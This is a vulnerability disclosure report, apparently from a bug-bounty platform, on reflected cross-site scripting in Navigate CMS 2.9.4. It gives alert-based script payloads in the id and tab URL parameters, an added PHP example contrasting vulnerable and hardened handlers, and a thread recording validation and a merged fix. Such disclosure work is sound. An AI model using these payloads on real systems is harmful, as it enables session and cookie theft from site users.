Cross-site Scripting (XSS) - Reflected in navigatecms/navigate-cms


Reported on

Jan 30th 2022


Cross-site scripting (XSS) is a vulnerability that allows attackers to execute arbitrary JavaScript code in the victim's browser.

Proof of Concept

Parameter: id

Payload: <script>alert(document.cookie)</script>

Affected endpoints:

On Firefox browser, visit:

1 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3Cscript%3Ealert(%22xss-1%22)%3C/script%3E

2 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

3 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3CsCriPt%3Ealert(%22XSS-1%22)%3C/sCriPt%3E&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E


An XSS alert will pop up showing the user's cookie or xss-1.


This vulnerability is capable of capturing the cookies of anyone who navigates to the vulnerable URL.
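
The reflection reported above, next to a hardened handler, as an added example that is not part of the original report and is not Navigate CMS code. The function names, the markup, and the assumption that `id` is a positive integer file id are hypothetical; the first two query strings are taken from the URLs above and the third is constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical handler that reflects request parameters into HTML.
// Illustrative names only; this is not Navigate CMS code.

// Vulnerable pattern: the raw parameter is concatenated into markup.
function render_unsafe(array $query): string
{
    return '<div data-file="' . ($query['id'] ?? '') . '"></div>';
}

// Assumption: `id` is a positive integer file id, so validate it as one.
// Arrays (id[]=x), empty values and markup all fail validation.
function parse_id(array $query): ?int
{
    $id = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return is_int($id) ? $id : null;
}

// Encode for HTML body/attribute context. The result does not depend on
// tag case, so <sCriPt> is neutralised the same way as <script>.
function h($value): string
{
    return is_string($value)
        ? htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        : '';   // non-string input such as tab[]=x is dropped
}

function render_safe(array $query): string
{
    $id = parse_id($query);
    if ($id === null) {
        return '<p>Invalid file id.</p>';   // fixed string, nothing reflected
    }
    return '<div data-file="' . $id . '" data-tab="' . h($query['tab'] ?? '') . '"></div>';
}

$samples = [
    'fid=files&act=edit&op=replace_file&id=%3Cscript%3Ealert(%22xss-1%22)%3C/script%3E',
    'fid=files&act=edit&op=replace_file&id=%3CsCriPt%3Ealert(%22XSS-1%22)%3C/sCriPt%3E&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E',
    'fid=files&act=edit&id=42&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E', // constructed
];
foreach ($samples as $qs) {
    parse_str($qs, $query);   // decodes the percent-encoding like $_GET would
    echo render_safe($query), PHP_EOL;
}
```

The first two samples are rejected by the integer check on `id`; the third passes validation and shows `tab` arriving as inert, entity-encoded text.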



We are processing your report and will contact the navigatecms/navigate-cms team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a 4 months ago
Faisal Fs
4 months ago


@admin, it has been fixed.

Jamie Slome validated this vulnerability 4 months ago
Faisal Fs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on f9af8c 4 months ago
The fix bounty has been dropped
files.php#L298 has been validated